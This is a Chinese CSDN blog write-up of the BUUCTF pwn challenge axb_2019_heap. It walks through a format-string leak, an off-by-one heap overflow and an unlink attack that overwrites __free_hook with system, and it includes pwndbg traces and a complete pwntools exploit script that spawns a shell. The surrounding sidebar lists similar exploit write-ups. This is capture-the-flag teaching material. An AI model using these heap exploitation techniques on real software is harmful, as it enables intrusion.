axb_2019_heap详解

最新推荐文章于 2024-02-20 00:57:52 发布
最新推荐文章于 2024-02-20 00:57:52 发布
阅读量607 收藏 2
点赞数
分类专栏: CTF 文章标签: buu axb_2019_heap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43935969/article/details/116140863
版权

关于axb_2019_heap的详解

参考:buuctf axb_2019_heap

程序流程

  1. banner:存在格式化字符串漏洞,可以泄漏栈上的信息

  2. add:根据idx创建size(大于0x80)大小的内容为content的块

    块指针和块大小存放在一个全局变量note中

  3. delete:释放的很干净,没有uaf

  4. edit:存在off by one

    get_input(*((_QWORD *)&note + 2 * v1), *((_DWORD *)&note + 4 * v1 + 2));

    if ( a2 + 1 <= (unsigned int)v3 )v3是以及输入的长度,a2是给定的长度,存在一个字节的溢出

调试

这个程序没有保留调试信息,不能调试,只能一步步看,,,

GDB调试指南

Reading symbols from axb_2019_heap...(no debugging symbols found)...done.

漏洞利用

  1. 利用格式化字符串泄露栈上信息

    • __libc_start_main+240 => libc基地址

    • (main) ◂— push rbp => 程序基地址

  2. 由于存在全局变量note,故可以利用unlink控制chunk指针

  3. 修改__free_hook为system,get shell

详细过程

1.格式化字符串

计算偏移:直接算或者用工具 => 得到偏移为7

在这里插入图片描述

执行到printf(&format);

 ► 0x555555554b4e <banner+105>    call   printf@plt <printf@plt>
        format: 0x7fffffffde4c ◂— 'aaaaaaaa'
        vararg: 0x7fffffffb7b0 ◂— 'Hello, our name:'

pwndbg> stack 30
00:0000│ rsp    0x7fffffffde40 ◂— 0x0
01:0008│ rdi-4  0x7fffffffde48 ◂— 0x61616161ffffde60
02:0010│        0x7fffffffde50 ◂— 0x550061616161 /* 'aaaa' */	#输入的数据
03:0018│        0x7fffffffde58 ◂— 0xd23db0a55446d00
04:0020│ rbp    0x7fffffffde60 —▸ 0x7fffffffde80 —▸ 0x555555555200 (__libc_csu_init) ◂— push   r15
05:0028│        0x7fffffffde68 —▸ 0x555555555186 (main+28) ◂— mov    eax, 0
06:0030│        0x7fffffffde70 —▸ 0x7fffffffdf60 ◂— 0x1
07:0038│        0x7fffffffde78 ◂— 0x0
08:0040│        0x7fffffffde80 —▸ 0x555555555200 (__libc_csu_init) ◂— push   r15
09:0048│        0x7fffffffde88 —▸ 0x7ffff7a2d840 (__libc_start_main+240) ◂— mov    edi, eax	#可以泄露libc_base
0a:0050│        0x7fffffffde90 ◂— 0x1
0b:0058│        0x7fffffffde98 —▸ 0x7fffffffdf68 —▸ 0x7fffffffe2d3 ◂— '/home/winter/buu/axb_2019_heap'
0c:0060│        0x7fffffffdea0 ◂— 0x1f7ffcca0
0d:0068│        0x7fffffffdea8 —▸ 0x55555555516a (main) ◂— push   rbp	#main起始地址,可以泄露程序基地址

所以__libc_start_main+240的偏移为15,main的偏移为19。

通过计算即可得到libc_base和程序基地址(开启了pie,每次都不一样)

p.recvuntil("Enter your name: ")
payload = "%15$p.%19$p"
p.sendline(payload)
main_240 = int(p.recvuntil(".")[-13:-1],16)
push_rbp = int(p.recvuntil("\n")[-13:],16)
print(hex(main_240))
print(hex(push_rbp))

libc_base = main_240 - libc.sym['__libc_start_main'] - 240
pro_base = push_rbp - 0x116a
log.success(hex(libc_base))
log.success(hex(pro_base))
2.unlink

首先计算note地址 = 程序基地址 + note偏移 => note = pro_base + 0x0202060

接着申请三个块,0x98大小(方便修改下一个chunk)

  • 第一个chunk:构造fake chunk
  • 第二个chunk:用于释放,unlink
  • 第三个chunk:防止第二个chunk和top chunk合并
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x55830d656000
Size: 0xa1

Allocated chunk | PREV_INUSE
Addr: 0x55830d6560a0
Size: 0xa1

Allocated chunk | PREV_INUSE
Addr: 0x55830d656140
Size: 0xa1

Top chunk | PREV_INUSE
Addr: 0x55830d6561e0
Size: 0x20e21

pwndbg> x/50gx 0x55830d656000
0x55830d656000:	0x0000000000000000	0x00000000000000a1
0x55830d656010:	0x0000000061616161	0x0000000000000000
0x55830d656020:	0x0000000000000000	0x0000000000000000
0x55830d656030:	0x0000000000000000	0x0000000000000000
0x55830d656040:	0x0000000000000000	0x0000000000000000
0x55830d656050:	0x0000000000000000	0x0000000000000000
0x55830d656060:	0x0000000000000000	0x0000000000000000
0x55830d656070:	0x0000000000000000	0x0000000000000000
0x55830d656080:	0x0000000000000000	0x0000000000000000
0x55830d656090:	0x0000000000000000	0x0000000000000000
0x55830d6560a0:	0x0000000000000000	0x00000000000000a1
0x55830d6560b0:	0x0000000062626262	0x0000000000000000
0x55830d6560c0:	0x0000000000000000	0x0000000000000000

pwndbg> x/30gx 0x55830ca49060
0x55830ca49060 <note>:	0x000055830d656010	0x0000000000000098
0x55830ca49070 <note+16>:	0x000055830d6560b0	0x0000000000000098
0x55830ca49080 <note+32>:	0x000055830d656150	0x0000000000000098
0x55830ca49090 <note+48>:	0x0000000000000000	0x0000000000000000

add(0,0x98,'aaaa')
add(1,0x98,'bbbb')
add(2,0x98,'cccc')

通过第一个chunk构造,并off by one修改第二个chunk的大小。

pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x55d2cb54e000
Size: 0xa1

Allocated chunk
Addr: 0x55d2cb54e0a0
Size: 0xa0			#修改标志位,表示上一个chunk被释放

Allocated chunk | PREV_INUSE
Addr: 0x55d2cb54e140
Size: 0xa1

Top chunk | PREV_INUSE
Addr: 0x55d2cb54e1e0
Size: 0x20e21

pwndbg> x/30gx 0x55d2cb54e000
0x55d2cb54e000:	0x0000000000000000	0x00000000000000a1	#第一个chunk
0x55d2cb54e010:	0x0000000000000000	0x0000000000000090	#fake chunk
0x55d2cb54e020:	0x000055d2cb00d048	0x000055d2cb00d050	#fd、bk
0x55d2cb54e030:	0x6161616161616161	0x6161616161616161
0x55d2cb54e040:	0x6161616161616161	0x6161616161616161
0x55d2cb54e050:	0x6161616161616161	0x6161616161616161
0x55d2cb54e060:	0x6161616161616161	0x6161616161616161
0x55d2cb54e070:	0x6161616161616161	0x6161616161616161
0x55d2cb54e080:	0x6161616161616161	0x6161616161616161
0x55d2cb54e090:	0x6161616161616161	0x6161616161616161
0x55d2cb54e0a0:	0x0000000000000090	0x00000000000000a0	#pre_size = 0x90,size = 0xa0
0x55d2cb54e0b0:	0x0000000062626262	0x0000000000000000
0x55d2cb54e0c0:	0x0000000000000000	0x0000000000000000

note = pro_base + 0x0202060
payload = p64(0) + p64(0x90)
payload += p64(fd) + p64(bk)
payload += 'a' * 0x70
payload += p64(0x90) + p8(0xa0)
print(hex(len(payload)))
edit(0,payload)
print(hex(note))

释放第二个chunk,造成unlink,target = target - 0x18

#没变化
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x55682bfdf000
Size: 0xa1

Allocated chunk
Addr: 0x55682bfdf0a0
Size: 0xa0

Allocated chunk
Addr: 0x55682bfdf140
Size: 0xa0

Top chunk | PREV_INUSE
Addr: 0x55682bfdf1e0
Size: 0x20e21


pwndbg> x/30gx 0x55682bfdf000
0x55682bfdf000:	0x0000000000000000	0x00000000000000a1
0x55682bfdf010:	0x0000000000000000	0x0000000000000131	#合并了,大小为0x90 + 0xa0
0x55682bfdf020:	0x00007fea30ac5b78	0x00007fea30ac5b78
0x55682bfdf030:	0x6161616161616161	0x6161616161616161
0x55682bfdf040:	0x6161616161616161	0x6161616161616161
0x55682bfdf050:	0x6161616161616161	0x6161616161616161
0x55682bfdf060:	0x6161616161616161	0x6161616161616161
0x55682bfdf070:	0x6161616161616161	0x6161616161616161
0x55682bfdf080:	0x6161616161616161	0x6161616161616161
0x55682bfdf090:	0x6161616161616161	0x6161616161616161
0x55682bfdf0a0:	0x0000000000000090	0x00000000000000a0
0x55682bfdf0b0:	0x0000000062626262	0x0000000000000000
0x55682bfdf0c0:	0x0000000000000000	0x0000000000000000

pwndbg> x/30gx 0x55682b44c060
0x55682b44c060 <note>:	0x000055682b44c048	0x0000000000000098#target = target - 0x18
0x55682b44c070 <note+16>:	0x0000000000000000	0x0000000000000000
0x55682b44c080 <note+32>:	0x000055682bfdf150	0x0000000000000098

dele(1)
3.修改__free_hook为system

通过第一个chunk,覆盖第一个chunk的指针指向__free_hook的地址

设置第二个chunk为参数“/bin/sh\x00”,只要让chunk2指向后面的地址,在上面的地址布置上字符串即可。

pwndbg> x/30gx 0x55cbe5291060
0x55cbe5291060 <note>:	0x00007f962216f7a8	0x0000000000000098		#__free_hook地址
0x55cbe5291070 <note+16>:	0x000055cbe5291078	0x0068732f6e69622f	#binsh地址 binsh字符串
0x55cbe5291080 <note+32>:	0x000055cbe5975100	0x0000000000000098
0x55cbe5291090 <note+48>:	0x0000000000000000	0x0000000000000000

pwndbg> x/30gx 0x00007f962216f7a8
0x7f962216f7a8 <__free_hook>:	0x0000000000000000	0x0000000000000000

system = libc_base + libc.sym['system']
free_hook = libc_base + libc.sym['__free_hook']
payload = p64(0) * 3
payload += p64(free_hook) + p64(0x98)
payload += p64(note + 24) +"/bin/sh\x00"
edit(0,payload)

第一个chunk指向__free_hook,往chunk1填入数据就是往__free_hook填入数据,修改其为system地址。

pwndbg> x/30gx 0x5578fc638060
0x5578fc638060 <note>:	0x00007f909293e7a8	0x0000000000000098
0x5578fc638070 <note+16>:	0x00005578fc638078	0x0068732f6e69622f
0x5578fc638080 <note+32>:	0x00005578fd63e100	0x0000000000000098

pwndbg> x/30gx 0x00007f909293e7a8
0x7f909293e7a8 <__free_hook>:	0x00007f90925bd3a0	

pwndbg> x/30gx 0x00007f90925bd3a0
0x7f90925bd3a0 <__libc_system>:	0xfa86e90b74ff8548	

edit(0,p64(system))

最后,释放第二个chunk即可执行free(2) => system("/bin/sh\x00")

dele(1)

完整exp

from pwn import *

p = process("./axb_2019_heap")
# p=remote("node3.buuoj.cn",28733)
context.log_level = 'debug'
elf = ELF("./axb_2019_heap")
libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
# libc = ELF("./libc-2.23.so")

def cmd(choice):
	p.recvuntil(">> ")
	p.sendline(str(choice))

def add(idx,size,content):
	cmd(1)
	p.recvuntil("to create (0-10):")
	p.sendline(str(idx))
	p.recvuntil("Enter a size:")
	p.sendline(str(size))
	p.recvuntil("Enter the content:")
	p.sendline(content)

def dele(idx):
	cmd(2)
	p.recvuntil("Enter an index:")
	p.sendline(str(idx))

def edit(idx,content):
	cmd(4)
	p.recvuntil("Enter an index:")
	p.sendline(str(idx))
	p.recvuntil("Enter the content: ")
	p.sendline(content)

p.recvuntil("Enter your name: ")
payload = "%15$p.%19$p"
p.sendline(payload)

main_240 = int(p.recvuntil(".")[-13:-1],16)
push_rbp = int(p.recvuntil("\n")[-13:],16)
print(hex(main_240))
print(hex(push_rbp))

libc_base = main_240 - libc.sym['__libc_start_main'] - 240
pro_base = push_rbp - 0x116a
log.success(hex(libc_base))
log.success(hex(pro_base))

system = libc_base + libc.sym['system']
note = pro_base + 0x0202060


add(0,0x98,'aaaa')
add(1,0x98,'bbbb')
add(2,0x98,'cccc')
print(hex(note))

fd = note - 0x18
bk = note - 0x10

payload = p64(0) + p64(0x90)
payload += p64(fd) + p64(bk)
payload += 'a' * 0x70
payload += p64(0x90) + p8(0xa0)
print(hex(len(payload)))
edit(0,payload)
print(hex(note))
dele(1)


free_hook = libc_base + libc.sym['__free_hook']
payload = p64(0) * 3
payload += p64(free_hook) + p64(0x98)
payload += p64(note + 24) +"/bin/sh\x00"
edit(0,payload)

edit(0,p64(system))

print(hex(note))
gdb.attach(p)
pause()
dele(1)

p.interactive()

组合拳,题型:fmt + off by one + unlink

书文的学习记录本
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【Pwn】2019安洵杯线上赛 Heap
Nothing
12-01 455
一道常规的pwn题,查看程序保护。 保护全开。分析程序发现bannar函数有格式化字符串漏洞,可以用来泄露代码段基址以及Libcdi地址,edit函数有一字节溢出,可以修改next chunk的size,且chunk指针存储在bss段上想到unlink。 from pwn import * io=remote('xx.xx.xx.xx',xxxxx) libc=ELF('./libc-2.23...
讨论课5答案_9020055601
08-03
10. **矩阵方程的解**:矩阵方程`AXB = C`的解`X`要求`B`的列向量可以用`A`的列向量线性表示。如果`A`和`B`的列向量线性相关,那么`X`可能存在。 通过这些知识点的学习,我们可以深入理解线性代数的核心概念,这...
axb_2019_heap
doudoudedi
02-05 926
思路 格式化字符串泄露程序基址和libc基址然后unlink一个指针到bss段将free_hook写入system释放即可拿到shell exp: from pwn import * #p=process('./axb_2019_heap') p=remote('node3.buuoj.cn',29873) elf=ELF('./axb_2019_heap') libc=elf.libc #gdb...
buuctf axb_2019_heap
weixin_45677731的博客
09-23 1600
拖进IDA之后,发现输入函数是存在off-by-one漏洞的,可以进行溢出 同时存在全局指针数组,就可以利用这个溢出来构造fake chunk,然后实现unlink 除此之外,这个程序malloc的大小是不能小于0x80的,额。。。其实这个不重要,问题不大,注意下就好了 但是,程序的保护全都开启了 也就是说,程序的地址是随机的,我们并不知道chunk指针的存放地址 如何泄露呢?这时还发现程序开头存在格式化字符串的漏洞 打开调试,输入8个a,在printf(&format)这里停一下,然后看下栈
[BUUCTF]PWN——axb_2019_heap(格式化字符串,off-by-one,unlink)
mcmuyanga的博客
01-26 788
axb_2019_heap 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看大概的情况,经典的堆题的菜单 64位ida载入 main() banner()
福建省平和南靖等五校2018_2019学年高二生物上学期第一次联考试题.doc
11-30
【知识点详解】 1. **基因分离定律和自由组合定律**:题目中提到的孟德尔豌豆杂交实验涉及了基因的分离定律和自由组合定律。分离定律是指在形成配子时,成对的遗传因子彼此分离,进入不同的配子中;自由组合定律是...
Asm.rar_SUM
09-21
从提供的文件名"A+B.ASM"、"AxB+C.ASM"和"AxB.ASM"来看,我们可以推测这些程序分别实现了两个数相加、两个数相乘以及可能的乘加运算。 在计算机科学中,汇编语言是一种低级编程语言,它与机器语言密切相关,但比...
poj.rar_MáS
09-21
pku 3613 Cow Relays 题意:给一个无向图,求从起点s到终点e尽力n条边的路径最小值。 ...m表示节点个数,(aXb)表示a行b列的矩阵一个 ,那么(1Xm)* path[ l ](mXm) 。 最终复杂度为O(t^3logn)
漫画阅读工具axb.zip
07-16
axb漫画阅读工具:一款开源的漫画浏览神器》 在数字阅读日益普及的时代,漫画爱好者们对于便捷、高效的阅读工具需求越来越高。"axb漫画阅读工具"正是这样一款专为漫画迷量身打造的应用,它不仅能够处理各种常见的...
Buuctf:【axb_2019_heap】(格式化字符串,of by null,unlink)
weixin_51055545的博客
01-18 1269
Buuctf:【axb_2019_heap】(格式化字符串,of by null,unlink) 例行检查 64位,保护机制全开,IDA中分析 漏洞分析 此处edit()函数中会多写入\x00字节,导致溢出一个\x00字节,存在of by null 漏洞,add()中限制了我们申请堆块的大小,只能申请大于0x80的堆块 利用思路 1.利用格式化字符串漏洞泄露出程序基地址和libc基地址 2.利用unlink,通过unlink修改chunk0的内存地址为free_hook地址,再次edit0号堆块,覆写为s
[BUUCTF]-PWN:axb_2019_heap解析(格式化字符串漏洞,unlink,off by one)
最新发布
2301_79326813的博客
02-20 517
查看保护查看ida大致就是alloc创建堆块,free释放堆块,以及fill填充堆块。
buuctf hitcon_training,axb_2019_heap,unlink一般利用方法总结
weixin_46521144的博客
07-10 190
两道都是使用了unlink 并且两道题的方法一模一样,和上一篇的ZCTF的一道题也一样 使用unlink的题目一般有这样的特征 指针位置泄露(这三道题全都是在bss上的指针) 存在off-by-one或者off-by-null以及其他溢出修改漏洞 第一条用于控制unlink堆块的检验,第二条用于激活unlink,两者缺一不可。 利用方法: 制造unlink块,修改fd为ptr-0x18,bk为ptr-0x10,构造chunk_head和下一个chunk的prev_size,通过off修改下一个chun
axb-2019-fmt64
Stella_Leo的博客
08-24 679
格式化字符串,讲点不一样的 64位格式化字符串学习 题目来自2019安洵杯。 这个漏洞原理很简单,就是简单的格式化字符串漏洞,泄露和劫持got表。但是64位呢,和32位有一点点不一样的地方,在这里强调和学习记录一下 直接把我坑傻了顺便学习一下libcsearcher的用法 [*] '/home/l/Desktop/AD/axb_2019_fmt64' Arch: amd64-64-little RELRO: Partial RELRO Stack: No cana
AXB
weixin_30580341的博客
01-21 649
大数相乘 sum中,高位在前,所以两个乘数必须先转换一下,即末位在前,依此类推。 View Code 1 #include<stdio.h> 2 #include<string.h> 3 const int maxn = 505; 4 char a[ maxn ],b[ maxn ]; 5 int sum[ maxn*2 ]; 6...
shanghai2019_boringheap
doudoudedi
02-18 357
思路 abs函数(取绝对值)的溢出使得为负数然后改size构造2个指针指向同一chunk完成一次double free为远程ubuntu18即可以直接打free_hook exp: from pwn import * #p=process('./pwn') p=remote('node3.buuoj.cn',26942) elf=ELF('./pwn') libc=elf.libc def ad...
axb_2019_fmt32
、moddemod
07-19 841
exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './axb_2019_fmt32' # p = process(proc_name) p = remote('node3.buuoj.cn', 27478) elf = ELF(proc_name) read_got = elf.got['read'..
cmcc_simplerop
doudoudedi
02-20 1033
思路 明显rop可以用工具但是需要自己调一下长度emem exp: from pwn import * from struct import pack #io=process('./simplerop') io=remote('node3.buuoj.cn',27913) io.recvuntil(':') # Padding goes here p = 'a'*0x14+p32(1)*3 p +...
E:\Qt6book_Axb_6.0\sampl3_1\widget.cpp:6: error: allocation of incomplete type 'Ui::Widget'
06-04
这个错误提示是因为在Widget.cpp文件中,你尝试对一个不完整的类型Ui::Widget进行分配内存的操作。这通常是因为你在Widget.cpp中使用了Ui::Widget类的成员变量或成员函数,但是没有包含相应的头文件。 解决这个问题的方法是在Widget.cpp文件中包含相应的头文件,如: ```cpp #include "widget.h" #include "ui_widget.h" ``` 其中,"widget.h"是你的Widget类的头文件,"ui_widget.h"是由Qt Designer生成的包含Ui::Widget类定义的头文件。这样就可以在Widget.cpp中使用Ui::Widget类的成员变量和成员函数了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

书文的学习记录本

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值